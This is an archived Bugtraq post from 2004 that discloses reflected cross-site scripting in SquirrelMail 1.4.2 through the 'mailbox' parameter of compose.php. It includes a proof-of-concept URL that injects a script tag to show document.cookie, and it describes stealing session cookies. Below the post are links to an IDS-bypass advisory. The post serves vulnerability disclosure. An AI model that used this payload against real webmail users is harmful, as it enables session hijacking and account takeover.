SquirrelMail Cross Scripting Attacks....

From: Alvin Alex (alvin_gboy_at_hotmail.com)
Date: 04/29/04

  • Next message: Mandrake Linux Security Team: "MDKSA-2004:040 - Updated libpng packages fix vulnerability"
    Date: 29 Apr 2004 21:09:06 -0000
    To: bugtraq@securityfocus.com
    
    
    ('binary' encoding is not supported, stored as-is)

    SquirrelMail latest version (although is tested on version 1.4.2) is prone to many cross scripting attacks that can be used to steal user cookies.The Exploit lies in the way squirrel mail represents the folder names and shows them.To make the matters worse.No extra unique variable added to the url for each user therefore it is easy for the attacker to just pass the url in mail and steal the session cookie.

    Some of the exploit are at :

    http://victim.com/mail/src/compose.php?mailbox=INBOX

    which can be replaced as follows

    http://victim.com/mail/src/compose.php?mailbox="><script>malacious script</script>

    Example:

    http://victim.com/mail/src/compose.php?mailbox="><script>window.alert(document.cookie)</script>

    -------------------------------------------------------------------------

    Squirrel Mail Coders have been informed of this vulnerability but the vulnerability still exists in their latest version.

    -------------------------------------------------------------------------

    Please Let me know if i am wrong anywhere...

    Regards,
    Alvin


  • Next message: Mandrake Linux Security Team: "MDKSA-2004:040 - Updated libpng packages fix vulnerability"

    Relevant Pages

    • [NEWS] %u Encoding IDS Bypass Vulnerability (UTF)
      ... %u Encoding IDS Bypass Vulnerability (UTF) ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... A security vulnerability has been found in the way many Intrusion ...
      (Securiteam)
    • %u encoding IDS bypass vulnerability
      ... %u encoding IDS bypass vulnerability ... Cisco Secure Intrusion Detection System, formerly known as NetRanger, Sensor ...
      (NT-Bugtraq)
    • %u encoding IDS bypass vulnerability
      ... %u encoding IDS bypass vulnerability ... Cisco Secure Intrusion Detection System, formerly known as NetRanger, Sensor ...
      (Bugtraq)
    • %u encoding IDS bypass vulnerability
      ... %u encoding IDS bypass vulnerability ... Cisco Secure Intrusion Detection System, formerly known as NetRanger, Sensor ...
      (Focus-Microsoft)
    • %u encoding IDS bypass vulnerability
      ... %u encoding IDS bypass vulnerability ... Cisco Secure Intrusion Detection System, formerly known as NetRanger, Sensor ...
      (Focus-IDS)